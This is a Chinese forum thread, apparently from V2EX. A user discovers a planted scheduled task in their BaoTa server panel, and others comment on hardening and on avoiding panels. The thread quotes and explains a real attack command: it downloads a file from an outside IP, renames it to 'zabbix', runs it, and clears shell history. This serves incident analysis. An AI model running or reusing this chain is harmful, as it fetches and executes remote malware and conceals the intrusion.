我的宝塔面板里突然多了一个计划任务

wget http://103.122.247.146/seo.txt：这个命令会使用 wget 工具下载一个名为 seo.txt 的文件从 http://103.122.247.146 这个地址。

&&：这个符号表示在前一个命令成功执行后才执行下一个命令。

mv seo.txt zabbix：将下载的 seo.txt 文件重命名为 zabbix 。

&&：再次使用 && 连接，执行下一个命令。

chmod +x zabbix：给 zabbix 文件添加可执行权限。

&&：再次使用 && 连接，执行下一个命令。

./zabbix：运行名为 zabbix 的文件。

&&：再次使用 && 连接，执行下一个命令。

history -cw：清除命令历史记录。

宝塔这东西，感觉放公网有些危险，前端最好再弄一层认证。
或者在内网测试用用。
跑生产的话，感觉还是不用为妙。

"mv seo.txt zabbix && chmod +x zabbix && ./zabbix" 这段就是打算执行这个文件了。这个 seo.txt 本质上是个可执行文件，目的可能是寻求系统漏洞，安装后门之类的。

顺便说下，PHP 开发的东西出现漏洞的几率比其他语言大很多，所以连开源软件我向来都是避开 PHP

玩票项目才会用宝塔，要长期运转的项目绝对不装任何面板

从来不用 bt 这些玩意儿

宝塔有云控，权限不再自己这边，所以一般不用的

文件头 ELF ，下载了个可执行文件执行了

10M 带宽的机器

宝塔? 生怕自己不变肉鸡是吧

@yidinghe 就你一个人回答问题，我真是笑了。


========
计划任务里出任何东西都是被黑了，正常不存在的，备份数据然后重装吧。
另外可以考虑除了必要端口外，都在云控制面板里锁死登录 IP 。
我自己是 80 和 443 以外，都仅限个人电脑或者一台吃灰 windows 云登录，过去这 6 7 年没什么安全问题，哪怕密码就是 123456qweR

@woshinide300yuan 个人的 ip 不是会变吗，你总不能每次变了后再改配置吧。

@WashFreshFresh 我不是写俩条件吗。 但的确每次重启后会再配置，所以我家路由器几个月不重启一次。

@WashFreshFresh 就是去阿里云后台改个安全组 IP ，其他的不变。

@Bingchunmoli 听说可以免密登录任何后台